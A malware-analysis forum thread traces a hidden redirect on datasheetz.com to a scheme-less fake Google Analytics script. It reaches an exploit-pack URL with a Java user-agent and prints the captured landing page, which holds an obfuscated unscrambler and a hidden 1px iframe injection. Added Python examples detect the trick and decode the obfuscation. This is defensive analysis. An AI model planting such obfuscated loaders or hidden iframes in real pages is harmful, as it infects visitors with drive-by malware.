Malware Domain List

Malware Related => Malware Analysis => Topic started by: SysAdMini on November 26, 2012, 02:04:14 pm

Title: Nice trick on datasheetz.com
Post by: SysAdMini on November 26, 2012, 02:04:14 pm
A suspicious url was being blocked by web filtering software. Referrer was datasheetz.com.
I looked at the code of datasheetz.com. At a first glance there was nothing suspicious to find.

(http://www.malwaredomainlist.com/pics/datasheetz1.png)

It took me some time to figure out where the suspicious url came from.
Look at the final script statement at the end of the page code.

Line

Code: [Select]
<script src="www.google-analytics.com/urchin.js" type="text/javascript"></script>
looks unsuspicious, because it looks like a normal Google Analytics request. But it's the key.
The url is missing the http:// statement. That means that the url is relative to the current url - actually

hxxp://datasheetz.com/www.google-analytics.com/urchin.js

There you can find the code creating the suspicious url.

(http://www.malwaredomainlist.com/pics/datasheetz2.png)

(http://www.malwaredomainlist.com/pics/datasheetz3.png)

I don't get any content from that url. Please let me know if you get something. Url changes occasionally.
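The trick described in this post is easy to check for mechanically: a `src` value with no scheme and no leading `//` is a relative reference, so a browser joins it onto the page's own URL, whatever hostname it appears to spell out. The following script is an added example for illustration (it is not code from this thread or from the site under discussion): it collects every `<script src>` on a page, resolves each against the page URL the way a browser would, and reports the ones that read like a hostname but actually point back at the current site. The embedded HTML is a constructed sample that mirrors the `urchin.js` line quoted above.

```python
"""Flag <script src> values that look like an absolute URL to a human
but resolve as a relative path in the browser (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# A value that starts with something hostname-like ("www.example.com/...")
# rather than a scheme ("http://...") or a path ("/js/...").
HOSTLIKE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/|$)", re.I)


class ScriptSrcCollector(HTMLParser):
    """Gather the raw src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def find_misleading_script_srcs(page_url, html):
    """Return one finding per script src that is scheme-less, host-less
    and hostname-looking, together with the URL it really resolves to."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        parts = urlsplit(src)
        # "http://host/..." has a scheme; "//host/..." has a netloc;
        # both are genuine remote references and are skipped here.
        if parts.scheme or parts.netloc:
            continue
        if not HOSTLIKE.match(src):
            continue
        resolved = urljoin(page_url, src)  # same join a browser performs
        findings.append({
            "src": src,
            "looks_like_host": src.split("/")[0],
            "resolved": resolved,
            "actual_host": urlsplit(resolved).netloc,
        })
    return findings


# Constructed sample page: three ordinary script references and one
# scheme-less reference of the kind discussed in the post.
SAMPLE_PAGE = """<html><head>
<script src="http://www.google-analytics.com/ga.js"></script>
<script src="//www.google-analytics.com/ga.js"></script>
<script src="/js/app.js"></script>
<script src="www.google-analytics.com/urchin.js" type="text/javascript"></script>
</head><body></body></html>"""


if __name__ == "__main__":
    for f in find_misleading_script_srcs("http://datasheetz.com/", SAMPLE_PAGE):
        print(f"{f['src']!r} names {f['looks_like_host']} but loads from "
              f"{f['actual_host']}: {f['resolved']}")
```

Only the fourth reference is reported; the other three are either absolute, protocol-relative, or plainly a local path. The same check is cheap to run over a proxy's saved responses when a blocked request has an unexpected referrer, as in the case that started this thread.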

Title: Re: Nice trick on datasheetz.com
Post by: GmG on November 27, 2012, 02:31:32 pm
You need to include Java in the user agent string

like

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Java/1.7.0_5

Title: Re: Nice trick on datasheetz.com
Post by: SysAdMini on November 27, 2012, 02:49:13 pm
Thanks! That brings me one step further.

Now I'm stuck at a url like this one:

Code: [Select]
http://www3.x9dci2nxllju.pcanywhere.net/?n3n5lc=kqjXmamYrXCVidWlq6Wekt7p2nChZp6YrW%2FFmqBj1Jw%3D
It resolves to 188.116.34.244, but doesn't respond.

Title: Re: Nice trick on datasheetz.com
Post by: GmG on November 27, 2012, 07:20:07 pm
the same for me

but it works in urlquery

http://urlquery.net/report.php?id=234953

http://www.kahusecurity.com/2012/analyzing-a-new-exploit-pack/

Title: Re: Nice trick on datasheetz.com
Post by: SysAdMini on November 27, 2012, 09:11:21 pm
Current url works.

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"   >
<head><meta  content="text/html; charset=utf-8" http-equiv="Content-Type" /><meta http-equiv="Content-Language" content="en"
/>
<meta http-equiv="Cache-control" content="Public"  />  <link  href="http://www.yahoo.com/favicon.ico"></link>

<title>Smart Tools</title>
<script>function ty0mvk0t2Hu(iFoAu){iFoAu=iFoAu.replace(/~/gi,"\\").replace(/``/gi,"\"");var BlSlw="6874";var agFSNM;var guAA=[];function TKvzf(){var bZhQ='gTzU';if('RPpIXv'=='mCaJjp')sHTZo();}
var vFfUot=0;var NkMcK;for(var i=0;i<iFoAu.length;i++){if((iFoAu.length-i)>=parseInt(BlSlw.substring(vFfUot,vFfUot+1))){if('PEFQ'=='evPd')dyTI='aAhu';var pain=parseInt(BlSlw.substring(vFfUot,vFfUot+1));for(var i2=i+pain-1;i2>=i;i2--){guAA.push(iFoAu.substring(i2,i2+1));var bOVG;}
i+=parseInt(BlSlw.substring(vFfUot,vFfUot+1))-1;function HRSBJ(){}}else{var ch_i=i;guAA.push((iFoAu.substring((ch_i+1-1),(ch_i+1))));if('blkArJ'=='ySUudk')cZQgi='sKBaA';}
vFfUot++;if(vFfUot>BlSlw.length-1)vFfUot=0;if('KhCo'=='BHJBuE')jquL='XuKI';}
BRJi=window;BRJi["wW48wk9Gz5ruNyfQ0HT2VV"]=guAA.join('');if('chMi'=='cBvVw')PPLT='cMKEjG';}</script></head><body><div   id="lcAmX"
class="RWjBA&#66;" ></div><div
id="Zrq&#115;z"
qyerD="loQysd" class="UsTu"
></div>
<h2></h2>
<div
Xualiov="RFOwMGp"
id="KvDskKb"  class="ZEQxJH" ></div>
<script src="45270.js"></script>
<script>if('gDWTZ'=='cZLai')hoZTz='bGNpMu';function ZgqLdG(){}
var GchIb=document;var zaHceR;var ODbj="write";function lIaQ(){}
var VbXCqq="\x3c\x69f\x72ame  st\x79\x6c\x65=\"w\x69dt\x68:1px;he\x69ght:1px;po\x73it\x69on:\x61b\x73\x6flute\"  src=\"\x69.html\" \x3e\x3c/\x69fr\x61\x6de\x3e";var iqAKC=252;GchIb.psATl=GchIb[ODbj];if('iBYU'=='moYjY')OnFm='kInw';GchIb.psATl(VbXCqq);var OjkMuE=193;</script>
<div
id="&#102;zC&#113;"
class="mFqbp"  ></div><div  id="&#101;&#120;Row"  class="&#105;FjO" ></div><div  gUlZ="zwCmzF"  id="b&#75;x&#86;&#80;&#67;" class="c&#105;&#111;I"   ></div><div id="Za&#74;O&#120;y" class="&#82;mj&#72;"
></div></body>
<div
lRkysIQ="xhbUUqL"
id="OhtulPT"  class="fKHovrZHK" ></div>
</html>

http://urlquery.net/report.php?id=235488
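The `ty0mvk0t2Hu` function in the page above is a small unscrambler: after turning `~` into a backslash and a pair of backticks into a double quote, it walks the input in chunks whose sizes cycle through the digits of the string `"6874"`, reverses each chunk, and copies single characters once fewer characters remain than the current chunk size. The result is stored on `window` for the script loaded from `45270.js` to use. Below is an added re-implementation of that step in Python for offline analysis; it is not code from the thread, and since the actual scrambled payload is not quoted on this page the input used here is a constructed sample built from a harmless string. Because reversing fixed chunks is its own inverse, the same routine builds the sample and decodes it.

```python
"""Re-implementation of the chunk-reversal unscrambler seen in the
captured page, for analysis (added example)."""


def _reverse_chunks(s, key="6874"):
    """Walk s in chunks of size key[0], key[1], ... (cycling), reversing
    each chunk; when fewer characters remain than the current chunk size,
    copy one character and advance to the next key digit. This mirrors
    the loop in ty0mvk0t2Hu, including the i += pain-1 / i++ bookkeeping."""
    sizes = [int(d) for d in key]
    out = []
    i = 0
    k = 0
    while i < len(s):
        n = sizes[k]
        if len(s) - i >= n:
            out.append(s[i:i + n][::-1])
            i += n
        else:
            out.append(s[i])
            i += 1
        k = (k + 1) % len(sizes)
    return "".join(out)


def unscramble(text, key="6874"):
    """Full equivalent of ty0mvk0t2Hu: undo the '~' and '``' escapes,
    then reverse the chunks."""
    restored = text.replace("~", "\\").replace("``", '"')
    return _reverse_chunks(restored, key)


def scramble(plain, key="6874"):
    """Inverse of unscramble, used only to build a constructed sample:
    reverse the chunks, then apply the escapes the decoder expects."""
    return _reverse_chunks(plain, key).replace("\\", "~").replace('"', "``")


# Constructed sample: a harmless statement put through the same transform.
SAMPLE_PLAIN = 'document.title = "decoded sample";'
SAMPLE_SCRAMBLED = scramble(SAMPLE_PLAIN)


if __name__ == "__main__":
    print("scrambled:", SAMPLE_SCRAMBLED)
    print("decoded:  ", unscramble(SAMPLE_SCRAMBLED))
```

When analysing a capture like the one above, feed the string that the loaded script hands to `ty0mvk0t2Hu` into `unscramble()` and review the output in a text editor rather than executing it; changing the `key` argument covers variants that use a different digit string.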